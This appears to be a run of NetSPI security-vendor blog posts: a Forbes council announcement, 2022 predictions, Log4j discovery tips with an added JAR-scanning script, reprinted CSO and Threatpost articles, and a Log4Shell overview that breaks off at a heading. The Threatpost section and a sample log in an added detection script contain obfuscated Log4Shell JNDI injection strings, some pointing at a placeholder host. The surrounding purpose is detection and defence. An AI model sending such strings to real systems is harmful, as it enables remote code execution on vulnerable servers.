Travis was vetted and selected by a review committee based on the depth and diversity of his experience. Criteria for acceptance include a track record of successfully impacting business growth metrics, as well as personal and professional achievements and honors.  

“We are honored to welcome Travis into the community,” said Scott Gerber, founder of Forbes Councils, the collective that includes Forbes Technology Council. “Our mission with Forbes Councils is to bring together proven leaders from every industry, creating a curated, social capital-driven network that helps every member grow professionally and make an even greater impact on the business world.” 

“It’s exciting to be considered an expert among the impressive group of security and technology leaders on the Forbes Technology Council,” said Travis. “There is a lot we can learn from one another. I’m honored to share insights from my 20+ years in the infosec industry to help others better understand how to leverage offensive security activities and ultimately reduce organizational risk.”

Visit Travis’ profile and read his first published article, Three Reasons To Include Finance And Risk Leadership In Security Testing Discussions.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

About Forbes Councils 

Forbes Councils is a collective of invitation-only communities created in partnership with Forbes and the expert community builders who founded Young Entrepreneur Council (YEC). In Forbes Councils, exceptional business owners and leaders come together with the people and resources that can help them thrive. 

For more information about Forbes Technology Council, visit forbestechcouncil.com. To learn more about Forbes Councils, visit forbescouncils.com.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

[Post: NetSPI CTO Travis Hoyt Accepted into Forbes Technology Council. Excerpt: Follow Travis on the Forbes Technology Council for insights on cybersecurity leadership and strategy, penetration testing, blockchain security, and more. https://www.netspi.com/?p=27184, last modified 2022-01-19.]

[Post published 2022-01-04:]

And just like that, 2021 has come to a close. We started with SolarWinds and ended with Log4j… cyber adversaries certainly know how to keep us on our toes. In between, Microsoft Exchange, the Florida water plant, JBS, CNA Financial, Kaseya, EA, Colonial Pipeline, among other breach targets made headlines and shook up the security industry. 

Each of these pivotal moments may have brought fear, uncertainty, and doubt, but with that also came innovation, a sense of community, and lessons learned. If there’s one thing to take away from the past year, it’s to always reflect on and learn from your experiences – good or bad. 

In the name of reflection and moving forward, three NetSPI thought leaders, Travis Hoyt (CTO), Nabil Hannan (Managing Director), and Florindo Gallicchio (Head of Strategic Solutions), came together on a live panel to discuss their cybersecurity predictions for 2022.

Pulling from their decades of experience and daily conversations with some of the most prominent organizations across the globe, they tackled highly debated topics of 2021, from budgets to application security to ransomware. Continue reading to find out what they’re anticipating in the new year.

2022 cybersecurity budgets are going to rebound significantly 

“Throughout my career, budgeting has always been a challenge. In 2020 and 2021, security budgets had suffered a pretty big hit primarily due to companies allocating that money to work from home technologies, digital transformation, and business continuity amid the pandemic. And we’re beginning to see those budgets rebound.  

While we were cooped up in our houses and locked down at the beginning of the pandemic, the bad guys were not, and they kept busy uncovering egregious vulnerabilities to exploit. We've noticed that a game of catch-up is now being played and budgets are being allocated, or re-allocated, back to cybersecurity, penetration testing in particular.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI

CFOs will have more skin in the security game 

“For too long, companies have taken a reactionary approach to ransomware attacks – opting to pay, or not pay, after the damage has already been caused. I expect to see CFOs prioritizing conversations surrounding ransomware and cyber insurance within 2022 planning and budgetary meetings to develop a playbook that covers all potential ransomware situations and a corresponding strategy to mitigate both damage and corporate spend. If they don’t lead with proactivity and continue to take a laggard approach to ransomware and cyber insurance, they are leaving their companies at risk for both a serious attack and lost corporate funds. At mature organizations, CFOs are starting to understand that they've got a lot more skin in the game.” – Travis Hoyt, Chief Technology Officer, NetSPI

Cybersecurity insurers will ask deeper, more technical questions 

“There’s currently a lack of willingness to underwrite cybersecurity policies. The market is cracking down and underwriters are asking tougher questions. Cybersecurity is not just a line item in a budget, it's not just a percentage of spend against it, it has much more material impact to the business. As you look at the mitigations and activities that you'll need to do with respect to understanding what you have in your environment, your exposures, your vulnerabilities – attack surface management, penetration testing – you’ll also need to look at your control posture. How are your teams responding to incursions? What kind of breach and attack simulation activities are you pursuing? These are the items that underwriters are going to be curious about. It's a much deeper, much more technical set of questions than I have seen them ask historically, and I think it represents the evolution of the market.” – Travis Hoyt, Chief Technology Officer, NetSPI

More organizations will focus on risk in cybersecurity budgeting discussions 

“We’ve noticed a heightened focus on a risk approach or risk justification for budgets, over compliance, check-the-box approaches we've seen in the past. Companies are starting to build budget justifications based on risk to the business. In fact, we are seeing more clients take a risk-based approach to cybersecurity spend than before.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI 

2022 is the year of API security 

“Watching application security, in conjunction with software development, evolve over the last 15 years, we've seen a significantly large uptick in API based architectures. I'm predicting 2022 is going to be the year of the API, where organizations will become serious about securing their APIs.  

The Log4j issue arises from a bad habit that software development has fallen into: reusing components without fully understanding the implications. We're also building software with very small bite-sized components that interact with your web applications, your mobile applications, your thermostat at home, your smart car, and other things we rely heavily on. API security is going to get a lot more attention now because organizations are starting to realize how heavily dependent they are on this type of architecture. And you have to be dependent on this type of architecture if you truly want to build systems that are robust and scalable. I expect that API security will become one of the top priorities in the application security space this year.” – Nabil Hannan, Managing Director, NetSPI 

The concept of ‘shift left’ will transform into ‘shift everywhere’ 

“Shift left is a great thought process, and we need to continue doing that. But we also have to start focusing on shifting right. We need to shift everywhere. Thinking of application security holistically will enable you to protect your organization and protect your systems.  

Look at technologies beyond web firewalls. Start looking at the viability of RASP solutions. In certain scenarios, start thinking of how to integrate IAST into the QA testing process. All of these activities need to work together. The Log4j issue has highlighted the need to shift right. We need to learn from it and determine the right approach to protect our organizations for the next big vulnerability that comes up.” – Nabil Hannan, Managing Director, NetSPI 

SaaS security posture management (SSPM) will be prioritized in 2022 

“As organizations continue to become more reliant on SaaS technologies to enable digital transformation efforts, the security perimeter has expanded. Organizations now face a new source of cybersecurity risk as cybercriminals look to exploit misconfigurations or vulnerabilities in these SaaS technologies to wage costly attacks. In 2022, we can expect that organizations will become more focused on SaaS posture management and ensuring that their SaaS footprint is not left open as a vector for cyberattacks. This trend will be further accelerated by the insistence of insurance providers that organizations have a detailed understanding of their SaaS deployments and configurations or face higher premiums or even a refusal of insurance altogether.” - Travis Hoyt, Chief Technology Officer, NetSPI 

The blockchain security space will grow in awareness and acumen 

“Blockchain is an interesting space on the currency and finance side. But what we're actually seeing is that there are a lot of people that are interested in the underlying technology, the distributed ledger technology. There are a lot of organizations, or consortiums, that are starting to leverage this technology to solve a variety of problems that allow them to interact in ways that perhaps they would not have been able to do - or do efficiently - in the past.

It's one of those things that security teams are going to have to start paying attention to. While there are overlaps with respect to the security testing methodologies, there are some unique differences that will change your operating and security processes, especially when you're deploying them in a distributed fashion. My prediction is that we will see the blockchain security space start to grow in 2022.  

It's going to be a very compelling and interesting story. The acumen for attacking this technology by threat actors is already well cultivated. What we don't have is the same measure of acumen cultivation by the defenders. My call to action is, if this technology is going to be in play in your space, then you need to make sure that your teams understand how it operates, where it's unique, how it's unique, and what you need to defend it effectively and get that acumen development in place.” – Travis Hoyt, Chief Technology Officer, NetSPI 

Company culture could solve the cybersecurity hiring crisis  

“It’s no secret that cybersecurity, like many industries, is facing a hiring crisis. The Great Resignation we’re seeing across the country has underscored a growing trend spurred by the COVID-19 pandemic: employees will leave their company if it cannot effectively meet their needs or fit into their lifestyle. From a retention perspective, I expect to see department heads fostering a culture that’s built on principles like performance, accountability, caring, communication, and collaboration. Once this team-based viewpoint is established, employees will take greater pride in their work, producing positive results for their teams, the company and themselves – ultimately driving positive retention rates across the organization.” – Charles Horton, Chief Operations Officer, NetSPI [note: Charles was unable to attend the webinar, Nabil shared this prediction on his behalf]

The Skills Shortage Will Continue Until Hiring Practices Change  

“In 2022 the cybersecurity skills gap will persist, but organizations that take a realistic approach to cybersecurity hiring and make a commitment to building cybersecurity talent from the ground up will find the most success in addressing it. The focus in closing the skills gap often relies on educating a new generation of cybersecurity professionals through universities and trade programs, and generally encouraging more interest in young professionals joining the field. In reality, these programs will only have limited success. The real culprit behind the skills gap is that organizations often maintain unrealistic hiring practices, with cybersecurity degrees and certification holders often finding untenable job requirements such as 3+ years of experience for an entry level job.” – Nabil Hannan, Managing Director, NetSPI 

Want more? Watch our panel: 2022 Cybersecurity Predictions: What to Expect in the New Year

[Post: New Year, New Trends: 2022 Cybersecurity Predictions. Excerpt: Our experts reveal their security industry predictions for 2022, from cybersecurity budgets to application security to ransomware. https://www.netspi.com/?p=27044, last modified 2022-02-16.]

[Post published 2021-12-21:]

The first step to remediating Log4j vulnerabilities? Discovery.

Identifying Apache Log4j usage at scale in any environment can be a challenge. Generally, we're seeing companies struggle to develop comprehensive strategies to identify the vulnerability accurately across their entire environment. Getting real coverage involves reviewing all assets from both an authenticated and unauthenticated perspective, and often requires additional collaboration with business units and development teams. In some cases, this can be a challenge when there are "black boxes" on their networks that have no clear owner.

To help you get started, we’ve pulled together five discovery tips to identify vulnerable instances of Log4j. For additional detail and best practices for discovery, download our tip sheet: 5 Strategies for Log4j Vulnerability Identification.

  1. Perform both internal and external network scanning using common vulnerability scanners, such as Nmap or Nessus. Most of the Apache Log4j plugins used by vulnerability scanners only test a small subset of common HTTP headers, but they still provide basic coverage. To provide more comprehensive coverage, also perform focused web application testing. Create an inventory of externally and internally available web applications.
  2. Leverage existing security or configuration management tooling to search systems for files that are unique to Log4j. Then, follow up on positive matches to determine if they are running a vulnerable version of Apache Log4j. The files can be downloaded online: https://logging.apache.org/log4j/2.x/index.html.
  3. Reach out to vendors to determine if vulnerable Apache Log4j versions are being used by applications not developed by your company that have already been deployed to the environment.
  4. Collaborate with internal business units and development groups to determine if vulnerable Apache Log4j versions are being used by internally developed applications.
  5. Prioritize additional testing based on company-defined risk. Testing should focus on mapping the web application's attack surface and testing all identifiable dynamic elements such as common HTTP headers, parameters (GET, POST, JSON), and cookies.
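As an added example of the file-based discovery in tip 2 (this is not NetSPI's tooling or the tip sheet's script), the Python below walks a directory for Java archives, recurses into nested JARs and WARs, reports every log4j-core build it finds with the version taken from the file name, and flags builds that still contain JndiLookup.class. The sample archives, the REVIEW_BELOW threshold and the Finding/scan_tree names are constructed assumptions for the example.

```python
# Added example: Log4j 2 core discovery on disk (tip 2 above), not NetSPI's tooling.
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_LOOKUP = CORE_PREFIX + "lookup/JndiLookup.class"   # class the remediation removes
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FILENAME_VERSION = re.compile(r"log4j-core-([0-9][^/\\]*?)\.jar$", re.IGNORECASE)
# Assumption for this example: anything older than this is flagged for review.
# Set it from your vendor's current advisory before relying on the result.
REVIEW_BELOW = (2, 17, 1)


def parse_version(v: Optional[str]) -> Optional[Tuple[int, ...]]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); junk/None -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v or "")
    return tuple(int(g or 0) for g in m.groups()) if m else None


@dataclass
class Finding:
    path: str                 # nested archive entries are joined with "!"
    version: Optional[str]    # None for shaded/fat JARs with no log4j-core file name
    has_jndi_lookup: bool

    def needs_review(self) -> bool:
        v = parse_version(self.version)   # an unknown version is never "safe"
        return self.has_jndi_lookup or v is None or v < REVIEW_BELOW


def scan_archive(data: bytes, label: str, out: List[Finding]) -> None:
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container; nothing to inspect
    with zf:
        names = zf.namelist()
        if any(n.startswith(CORE_PREFIX) for n in names):
            m = FILENAME_VERSION.search(label)
            out.append(Finding(label, m.group(1) if m else None, JNDI_LOOKUP in names))
        for n in names:  # fat JARs and WARs bundle log4j-core inside them
            if n.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(n), f"{label}!{n}", out)


def scan_tree(root: str) -> List[Finding]:
    out: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, out)
    return sorted(out, key=lambda f: f.path)


def _jar_bytes(title: str, version: str, entries: List[str]) -> bytes:
    # Constructed sample archive: a manifest plus stub class entries.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n"
                    f"Implementation-Title: {title}\nImplementation-Version: {version}\n")
        for entry in entries:
            zf.writestr(entry, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed fixture: two bare log4j-core JARs, a WAR bundling an old one,
    and an unrelated JAR that must not be reported."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))
    core, log4j = [CORE_PREFIX + "Logger.class"], "Apache Log4j Core"
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.13.3.jar",
                    _jar_bytes(log4j, "2.13.3", core + [JNDI_LOOKUP]))
    samples = {
        "lib/log4j-core-2.14.1.jar": _jar_bytes(log4j, "2.14.1", core + [JNDI_LOOKUP]),
        "lib/log4j-core-2.17.1.jar": _jar_bytes(log4j, "2.17.1", core),
        "gson.jar": _jar_bytes("Gson", "2.8.9", ["com/google/gson/Gson.class"]),
        "app.war": war.getvalue(),
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print("REVIEW" if f.needs_review() else "ok    ", f.version or "?", f.path)
```

Point scan_tree at a real application or server root to get an inventory to follow up on; a None version means the archive embeds log4j-core without a recognisable file name and needs manual version confirmation.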

Log4j is another example of attackers targeting software that's integrated into core IT supply chains. However, Log4j represents a much greater risk than some of its predecessors, because it’s widely associated with multiple operating systems and websites exposed to the internet. As a result, attackers are scrambling to use it as quickly as possible to gain a foothold in environments and leverage it to deploy sophisticated attacks, such as ransomware. I think this will be the first of many breakouts that target not common software packages, but their dependencies/third-party components.

Time is critical in this situation, and vulnerability discovery is the first step to protecting your organization from exploitation. Connect with NetSPI to learn how we can help you with our Log4j Vulnerability Assessment: https://www.netspi.com/contact-us/.

Download NetSPI's Resource, "5 Strategies for Log4j Vulnerability Identification" Now!

[Post: 5 Apache Log4j Discovery Tips. Excerpt: Need help identifying vulnerable instances of Apache Log4j? Read this blog for 5 discovery tips. https://www.netspi.com/?p=26983, last modified 2021-12-21.]

[Post published 2021-12-20:]

On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO. Read the full article below or online here.

+++

Penetration testing, sometimes called ethical hacking or red team hacking, is an exciting career path in which you simulate cyberattacks on target systems in order to test (and, ultimately, improve) their security. It's a job that lots of people currently working in infosec would like to have, and one that can be tricky to get as competition heats up.

"It used to be the best way to grow a career in attack and penetration was through hands-on experience," says Matthew Eidelberg, technical manager for threat management at Optiv. "It’s becoming harder and harder to break into pen testing as a beginner, because these roles are no longer considered niche. They are in high demand. As a result, a lot of effort has gone into certifications based on training and real-world lab simulations for both students and professionals."

In fact, a range of penetration testing certifications are now available from various companies and industry organizations—and earning these certs can boost your career prospects, says Ron Delfine, director of career services at Carnegie Mellon University's Heinz College. "Depending on what skills an organization is seeking," he says, "certification holders may have a competitive advantage related to career advancement, as they have already been through a proven process requiring them to display evidence of strong penetration testing skills through the certification and recertification process."

Top penetration testing certifications

How can you pick the best penetration testing certification for you? We spoke to a number of pen testing pros to see how different certifications have helped their careers or helped them find good candidates when they were hiring. In general, most of the people we spoke to grouped certs offered by the same orgs together, so that's how we'll treat them here too.

  • Offensive Security Certified Professional (OSCP)
  • Offensive Security Wireless Professional (OSWP)
  • Offensive Security Experienced Penetration Tester (OSEP)
  • GIAC Penetration Tester (GPEN)
  • GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)
  • EC-Council Certified Ethical Hacker (CEH)
  • EC-Council Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master)
  • CompTIA PenTest+

. . .

EC-Council

The EC-Council is a cybersecurity education and training nonprofit founded in the wake of the 9/11 attacks, and Certified Ethical Hacker (CEH) is perhaps their highest-profile cert—in fact, it's one of the best-known certifications in the field. The EC-Council recently launched a twinned pair of certs, Certified Penetration Testing Professional (CPENT) and Licensed Penetration Tester (LPT Master), that are based on the same training material and exam, with the LPT Master going to those who score best on the test.

CEH is relatively well known, and the security pros we spoke to note that it has its place in the field, but they were less enthusiastic about it than they were about certs from GIAC or Offensive Security. "I would note CEH as a ‘foot-in-the-door’ certification for a pen testing internship or in preparation for additional study," says Melissa Miller, managing security consultant at NetSPI. Critical Start's Rhoads-Herrera calls it "valuable as a good way to get past HR screeners" but adds that "the course work is not up to par with other certifications."

"CEH does qualify you for a number of contracts by virtue of being one of the oldest in the game," says Pluralsight's Rosenmund, "but doesn’t necessarily ensure from an employer perspective that you are ready to do the job." Counter Hack Challenges' Elgee gives a specific example: "CEH is most valuable for checking specific certification boxes, especially in US government," but says it "otherwise has a low value to price ratio."

Certified Ethical Hacker (CEH):

Prerequisites: You must either take an EC-Council-approved CEH training course or establish that you have at least two years of professional infosec experience before you can take the exam.

Test format: Four hours, 125 multiple choice questions. If you pass this exam, you can also take the Certified Ethical Hacker Practical exam—six hours, 20 practical challenges—in order to earn CEH Master certification.

Cost: The exam costs $1,199 plus $100 for remote proctoring; there is a $100 nonrefundable application fee, and official training courses can cost anywhere from $850 to $2,999.

Official website: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/

Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master):

Prerequisites: Candidates must have already received CEH and Certified Security Analyst certs from the EC-Council, and submit an application that includes a criminal background check. The exam is meant to follow on from the EC-Council's CPENT training course, although experienced pen testers can request to "challenge" the exam based on their existing skills. 

Test format: A 24-hour online practical exam in which you deploy advanced pen-testing techniques. A 90% score or above earns you the LPT certification, while 70-90% scores you a CPENT.

Cost: The CPENT course is $2,199, which includes the exam and access to the EC-Council's practice range and other content. There is also a $500 application fee (which covers the background check).

Official website: https://www.eccouncil.org/programs/licensed-penetration-tester-lpt-master/

Post: CSO: 8 top penetration testing certifications employers value
Permalink: https://www.netspi.com/?p=26981
Excerpt: On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO.

Next post (published 2021-12-13):

On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost. Read the full article below or online here.

+++

What some call the worst cybersecurity catastrophe of the year – the Apache Log4j logging library exploit – has spun off 60 bigger mutations in less than a day, researchers said.

The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.

Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.

According to Microsoft researchers, beyond coin-miners, they’ve also seen installations of Cobalt Strike, which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.

Also, it could get a lot worse. Cybersecurity researchers at Check Point warned on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.

“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,” they said.

The flaw, which is uber-easy to exploit, has been named Log4Shell. It’s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world’s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.

Mutations May Enable Exploits to Slip Past Protections

On Monday, Check Point reported that Log4Shell’s new, malignant offspring can now be exploited “either over HTTP or HTTPS (the encrypted version of browsing).”

The more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. “It means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,” they wrote.

Because of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 Shellshock family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.

Tactical Shifts

Besides variations that can slip past protections, researchers are also seeing new tactics.

Luke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that the initial exploit attempts were basic callbacks coming from Tor nodes. They mostly pointed back to “bingsearchlib[.]com,” with the exploit being passed in the User-Agent header or the Uniform Resource Identifier (URI) of the request.

But since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there’s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.

“This originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,” Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) lookup string itself, by taking advantage of other substitution features of the JNDI lookup process.

He offered these examples:

${jndi:${lower:l}${lower:d}a${lower:p}://world80
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//
${jndi:dns://

…All of which achieve the same objective: “to download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,” Richards said.
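To show why the three obfuscated forms above are the same thing to a detector, here is an added example (my code, not Vectra's or Threatpost's): it resolves Log4j's lower/upper case lookups and default-value lookups (the ${env:NAME:-x} form on the page, plus the ${::-x} form that is not shown here) from the innermost brace outward, the way the logging library would, and then checks whether a JNDI lookup survives. For detection it assumes the referenced environment variable is unset, so each lookup yields its default. The log lines are constructed Apache-style access-log entries that reuse the page's patterns with a placeholder host.

```python
import re

# Innermost ${...} lookup: a body containing no nested braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# ${lower:x} / ${upper:x} case-transform lookups.
_CASE = re.compile(r"^(lower|upper):(.*)$", re.IGNORECASE | re.DOTALL)
# Any lookup written with a default value: ${env:NAME:-x}, ${sys:NAME:-x}, ${::-x}.
# Assumption for detection: the variable is unset, so the lookup yields its default.
_DEFAULTED = re.compile(r"^[^:]*:[^:]*:-(.*)$", re.DOTALL)
# A JNDI lookup once obfuscation has been stripped: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve(match):
    body = match.group(1)
    case = _CASE.match(body)
    if case:
        text = case.group(2)
        return text.lower() if case.group(1).lower() == "lower" else text.upper()
    defaulted = _DEFAULTED.match(body)
    if defaulted:
        return defaulted.group(1)
    return match.group(0)  # unknown lookup (including jndi itself): leave it in place


def normalize_lookups(text, max_rounds=32):
    """Resolve innermost lookups until nothing changes; bounded so hostile input cannot spin."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(text):
    """Return the JNDI scheme ('ldap', 'dns', ...) if a lookup survives normalization, else None."""
    m = _JNDI.search(normalize_lookups(text))
    return m.group(1).lower() if m else None


def scan_log(lines):
    """(line_number, scheme, normalized_line) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((number, scheme, normalize_lookups(line)))
    return hits


# Constructed sample access-log lines (placeholder host, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET /${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//example.invalid/b} HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:dns://example.invalid/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET /report?year=${date:yyyy} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, normalized in scan_log(SAMPLE_LOG):
        print(f"line {number}: jndi scheme={scheme}: {normalized}")
```

Matching on the normalized string rather than on the raw bytes is the point: a signature for the literal text "jndi:ldap" misses every variant the page lists, while a normalizer catches them and any new spelling of the same lookup. The benign ${date:yyyy} line is left alone, since only lookups that reduce to a JNDI reference are reported.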

Bug Has Been Targeted All Month

Attackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.

On Sunday, Sophos researchers said that they’d “already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,” noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.

“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince tweeted on Saturday. “That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”

On Sunday, Cisco Talos chimed in with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” it advised.

Exploits Attempted on 40% of Corporate Networks

Check Point said on Monday that it’s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it’s seen more than 100 attempts to exploit the vulnerability per minute.

As of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.

The map below illustrates the top targeted geographies.

[Map not reproduced: Top affected geographies. Source: Check Point.]

Hyperbole isn’t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: “It wouldn’t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,” Dali noted via email on Monday. “Connecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren’t taken right away.”

As has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability “is relatively easy to exploit, and we’ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,” Dali reiterated. “Hopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.”

This situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we’ve seen, along with some of the new protections and detection tools.

More News

New Protections, Detection Tools

  • On Saturday, Huntress Labs released a tool – available here – to help organizations test whether their applications are vulnerable to CVE-2021-44228.
  • Cybereason released Logout4Shell, a “vaccine” for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.

Growing List of Affected Manufacturers, Components

As of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list hosted on GitHub that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they’re affected by Log4Shell and provides links to evidence if they are.

Spoiler alert: Most are, including:

A Deep Dive and Other Resources

  • Immersive Labs has posted a hands-on lab of the incident.
  • Lacework has published a blog post regarding how the news affects security best practices at the developer level.
  • NetSPI has published a blog post that includes details on Log4Shell’s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.
Post: Threatpost: Log4Shell Is Spawning Even Nastier Mutations
Permalink: https://www.netspi.com/?p=26964
Excerpt: On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost.

Next post (published 2021-12-10):

Talk to any security professional and they’ll tell you that a vulnerability that allows unauthenticated remote code execution is about as critical as it gets. That’s exactly what CVE-2021-44228 allows.

On December 9, 2021, the severe Apache Log4j zero-day vulnerability was disclosed, along with its known exploits, creating a panic across the security community. The mere fact that a fix was put into place within hours of discovery is an indicator of how severe the vulnerability truly is. Given its severity, users are encouraged to take action immediately.

As teams scrambled to address CVE-2021-44228, a new vulnerability came about: CVE-2021-45046, as the fix for CVE-2021-44228 in Apache Log4j 2.15.0 was deemed "incomplete in certain non-default configurations." It causes the Log4j2 Thread Context Message Pattern and Context Lookup Pattern to be vulnerable to a Denial of Service (DoS) attack.

…And then yet another surfaced overnight, CVE-2021-45105. This third Log4j vulnerability is very similar to the initial Log4Shell zero-day: the previous patches did not protect against uncontrolled recursion from self-referential lookups, which could also result in a DoS attack.

Continue reading for details on the impact of these critical vulnerabilities, guidance to determine whether your organization is at risk of Log4j exploit, and mitigation recommendations.

What is the impact of the Log4Shell zero-day vulnerability?

The ubiquity of Log4j is the greatest concern. In just 24 hours, it has been reported that Apple iCloud, Twitter, Cloudflare, Minecraft, and Steam identified the vulnerability in their systems.

Its impact is expected to spread even further, given that Log4j is widely used across enterprise applications, including mobile applications, thick client applications, web applications, desktop GUI applications, and other Java-based applications, to record and log activity within an application.

If exploited, the vulnerability lets cybercriminals take control of an affected system remotely.

Is my organization vulnerable?

